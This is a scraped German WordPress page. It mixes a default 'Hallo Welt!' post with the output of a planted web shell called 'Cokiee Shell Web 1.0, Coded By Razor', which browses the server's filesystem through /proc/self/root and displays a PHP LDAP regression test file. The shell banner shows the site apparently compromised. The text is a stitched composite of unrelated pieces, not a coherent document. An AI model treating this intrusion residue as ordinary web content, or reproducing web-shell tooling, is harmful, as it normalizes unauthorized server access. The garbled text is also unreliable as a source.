Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/ldap/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/ldap/tests/bug73933.phpt |
--TEST-- Bug #73933 (error/segfault with ldap_mod_replace and opcache) --SKIPIF-- <?php require_once('skipif.inc'); ?> --FILE-- <?php /* We are assuming 3333 is not connectable */ $ldap = ldap_connect('127.0.0.1', 3333); ldap_mod_replace($ldap, null, array( 'lockoutTime' => array(0), )); ldap_modify_batch($ldap, null, array( [ "attrib" => "mail", "modtype" => LDAP_MODIFY_BATCH_ADD, "values" => [ "test@example.com", "test-2@example.com", ]])); ldap_close($ldap); ?> --EXPECTF-- Warning: ldap_mod_replace(): Modify: Can't contact LDAP server in %sbug73933.php on line %d Warning: ldap_modify_batch(): Batch Modify: Can't contact LDAP server in %sbug73933.php on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare